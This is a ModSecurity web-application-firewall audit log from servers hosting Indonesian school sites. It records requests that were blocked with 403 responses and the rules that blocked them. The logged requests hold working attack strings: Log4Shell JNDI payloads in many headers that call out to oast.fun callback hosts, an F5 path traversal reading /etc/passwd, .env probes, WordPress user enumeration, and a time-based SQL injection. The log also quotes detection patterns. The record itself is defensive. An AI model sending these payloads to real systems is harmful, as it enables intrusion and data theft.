HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.124.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.124.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --deabdc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --deabdc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747850907649495 2733 (- - -) Stopwatch2: 1747850907649495 2733; combined=1250, p1=427, p2=793, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --deabdc24-Z-- --70cea215-A-- [22/May/2025:01:17:10 +0700] aC4YpiioYDAgD0WHUjRFdwAAAE4 103.236.140.4 45362 103.236.140.4 8181 --70cea215-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 69.64.55.95 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 Cookie: X-Forwarded-For: 69.64.55.95 Accept-Encoding: gzip X-Varnish: 168295500 --70cea215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --70cea215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747851430052711 654 (- - -) Stopwatch2: 1747851430052711 654; combined=303, p1=256, p2=0, p3=0, p4=0, p5=47, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70cea215-Z-- --34f3ee00-A-- [22/May/2025:01:40:01 +0700] aC4eASioYDAgD0WHUjRGWAAAAE4 103.236.140.4 46240 103.236.140.4 8181 --34f3ee00-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168471785 --34f3ee00-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --34f3ee00-E-- --34f3ee00-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747852801119828 2498 (- - -) Stopwatch2: 1747852801119828 2498; combined=670, p1=521, p2=116, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34f3ee00-Z-- --ca84fd3c-A-- [22/May/2025:01:40:04 +0700] aC4eBCioYDAgD0WHUjRGWgAAAEE 103.236.140.4 46240 103.236.140.4 8181 --ca84fd3c-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 168471788 --ca84fd3c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ca84fd3c-E-- --ca84fd3c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747852804126812 2790 (- - -) Stopwatch2: 1747852804126812 2790; combined=743, p1=582, p2=128, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca84fd3c-Z-- --0247d376-A-- [22/May/2025:01:54:42 +0700] aC4hcov3pT1iV0OxjLSGkgAAAJg 103.236.140.4 46768 103.236.140.4 8181 --0247d376-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.213.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.213.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0247d376-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0247d376-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747853682189789 3548 (- - -) Stopwatch2: 1747853682189789 3548; combined=1512, p1=518, p2=956, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0247d376-Z-- --b292342e-A-- [22/May/2025:02:05:17 +0700] aC4j7Rpv_mIXt2pDBOq9RgAAAMM 103.236.140.4 35110 103.236.140.4 8181 --b292342e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 175.125.92.143 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 175.125.92.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36 --b292342e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b292342e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747854317060187 839 (- - -) Stopwatch2: 1747854317060187 839; combined=376, p1=342, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b292342e-Z-- --10190a21-A-- [22/May/2025:02:27:05 +0700] aC4pCXZGSt58M5vv3glChwAAABc 103.236.140.4 37322 103.236.140.4 8181 --10190a21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.245.248.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.245.248.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --10190a21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10190a21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747855625834477 4190 (- - -) Stopwatch2: 1747855625834477 4190; combined=2138, p1=711, p2=1388, p3=0, p4=0, p5=39, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10190a21-Z-- --395d5200-A-- [22/May/2025:03:28:56 +0700] aC43iCioYDAgD0WHUjRU5AAAAFg 103.236.140.4 44714 103.236.140.4 8181 --395d5200-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.235.128 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.235.128 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --395d5200-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --395d5200-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747859336347803 808 (- - -) Stopwatch2: 1747859336347803 808; combined=306, p1=266, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --395d5200-Z-- --ca149153-A-- [22/May/2025:03:38:47 +0700] aC4512friXjg62qQwE_grgAAAIw 103.236.140.4 45412 103.236.140.4 8181 --ca149153-B-- GET /?x=${jndi:ldap://${:-847}${:-283}.${hostName}.uri.d0mbkqa4kqtm561jt3n03tmkogpatgefb.oast.fun/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118237740 --ca149153-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ca149153-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747859927099801 5437 (- - -) Stopwatch2: 1747859927099801 5437; combined=3834, p1=475, p2=3331, p3=0, p4=0, p5=28, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca149153-Z-- --25cc1223-A-- [22/May/2025:03:38:50 +0700] aC452mfriXjg62qQwE_gsAAAAI8 103.236.140.4 45420 103.236.140.4 8181 --25cc1223-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-847}${:-283}.${hostName}.referer.d0mbkqa4kqtm561jt3n0m6ernehca9g74.oast.fun} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-847}${:-283}.${hostName}.useragent.d0mbkqa4kqtm561jt3n03tp7tfsp3i9bu.oast.fun} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-847}${:-283}.${hostName}.accept.d0mbkqa4kqtm561jt3n0hai991r66hji8.oast.fun} Accept-Language: ${jndi:ldap://${:-847}${:-283}.${hostName}.acceptlanguage.d0mbkqa4kqtm561jt3n0i5rbwjuci7h86.oast.fun} Access-Control-Request-Headers: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestheaders.d0mbkqa4kqtm561jt3n0943rwfqaiqo5q.oast.fun} Access-Control-Request-Method: ${jndi:ldap://${:-847}${:-283}.${hostName}.accesscontrolrequestmethod.d0mbkqa4kqtm561jt3n0x8njoxu3af9gr.oast.fun} Authentication: Bearer ${jndi:ldap://${:-847}${:-283}.${hostName}.authenticationbearer.d0mbkqa4kqtm561jt3n0nunkonit63ety.oast.fun} Location: ${jndi:ldap://${:-847}${:-283}.${hostName}.location.d0mbkqa4kqtm561jt3n0ohhbtasqo54n5.oast.fun} Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.origin.d0mbkqa4kqtm561jt3n01bisstyhs93ig.oast.fun} Upgrade-Insecure-Requests: ${jndi:ldap://${:-847}${:-283}.${hostName}.upgradeinsecurerequests.d0mbkqa4kqtm561jt3n0eknob614afpf1.oast.fun} X-Api-Version: ${jndi:ldap://${:-847}${:-283}.${hostName}.xapiversion.d0mbkqa4kqtm561jt3n0cm8tochypc91j.oast.fun} X-CSRF-Token: ${jndi:ldap://${:-847}${:-283}.${hostName}.xcsrftoken.d0mbkqa4kqtm561jt3n03mqh5j5wned6j.oast.fun} X-Druid-Comment: ${jndi:ldap://${:-847}${:-283}.${hostName}.xdruidcomment.d0mbkqa4kqtm561jt3n0jcjhjofaa51m9.oast.fun} X-Origin: ${jndi:ldap://${:-847}${:-283}.${hostName}.xorigin.d0mbkqa4kqtm561jt3n0k6iwjcx9i68tx.oast.fun} Cookie: ${jndi:ldap://${:-847}${:-283}.${hostName}.cookiename.d0mbkqa4kqtm561jt3n0ww1ar467znihy.oast.fun}=${jndi:ldap://${:-847}${:-283}.${hostName}.cookievalue.d0mbkqa4kqtm561jt3n04mwr4dq7sux9k.oast.fun} X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118237743 --25cc1223-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --25cc1223-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747859930111685 5329 (- - -) Stopwatch2: 1747859930111685 5329; combined=3760, p1=385, p2=3337, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25cc1223-Z-- --2ac17922-A-- [22/May/2025:03:59:33 +0700] aC4-tWfriXjg62qQwE_hHQAAAIs 103.236.140.4 46936 103.236.140.4 8181 --2ac17922-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 152.231.39.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.231.39.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2ac17922-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ac17922-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861173818170 3576 (- - -) Stopwatch2: 1747861173818170 3576; combined=1571, p1=536, p2=1004, p3=0, p4=0, p5=31, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ac17922-Z-- --1445521f-A-- [22/May/2025:04:04:26 +0700] aC4_2n0O04WKE1HJ5iT2wQAAAAc 103.236.140.4 47226 103.236.140.4 8181 --1445521f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.186.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.186.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1445521f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1445521f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861466980863 3492 (- - -) Stopwatch2: 1747861466980863 3492; combined=1540, p1=553, p2=956, p3=0, p4=0, p5=31, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1445521f-Z-- --d1dc8938-A-- [22/May/2025:04:04:39 +0700] aC4_5-ThJmFSRJ5-OZdT9AAAAFA 103.236.140.4 47238 103.236.140.4 8181 --d1dc8938-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118238715 --d1dc8938-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d1dc8938-E-- --d1dc8938-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861479124231 2807 (- - -) Stopwatch2: 1747861479124231 2807; combined=1578, p1=406, p2=1144, p3=0, p4=0, p5=27, sr=122, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1dc8938-Z-- --c4980703-A-- [22/May/2025:04:04:39 +0700] aC4_5-ThJmFSRJ5-OZdT9gAAAFI 103.236.140.4 47268 103.236.140.4 8181 --c4980703-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0mbkqa4kqtm561jt3n039w8typjzpcgg.oast.fun} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0mbkqa4kqtm561jt3n0t6etx4t4gp3xr.oast.fun} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0mbkqa4kqtm561jt3n0w5rwpd89enspn.oast.fun} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0mbkqa4kqtm561jt3n0oxd4nwnd11n68.oast.fun} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0mbkqa4kqtm561jt3n051j63yw8f7hgy.oast.fun} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0mbkqa4kqtm561jt3n0pxcygp66f5zan.oast.fun} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0mbkqa4kqtm561jt3n04wws7fqkt7efu.oast.fun} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0mbkqa4kqtm561jt3n0kt83cgsk7u8zw.oast.fun} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0mbkqa4kqtm561jt3n0a7qyc64jipjj5.oast.fun} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0mbkqa4kqtm561jt3n0mubs4q4rifckm.oast.fun} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0mbkqa4kqtm561jt3n0somr9zthntwgm.oast.fun} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0mbkqa4kqtm561jt3n06d7eo1iaog79z.oast.fun} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0mbkqa4kqtm561jt3n0fk457exsmwekz.oast.fun} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0mbkqa4kqtm561jt3n0s7jjj8hriewcn.oast.fun} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0mbkqa4kqtm561jt3n0u3thgah7d81om.oast.fun}=${jndi:ldap://${hostName}.cookievalue.d0mbkqa4kqtm561jt3n0kxyyi3gh7z5me.oast.fun} X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118238718 --c4980703-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c4980703-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861479145871 5184 (- - -) Stopwatch2: 1747861479145871 5184; combined=3802, p1=369, p2=3382, p3=0, p4=0, p5=50, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4980703-Z-- --83cdcf58-A-- [22/May/2025:04:09:30 +0700] 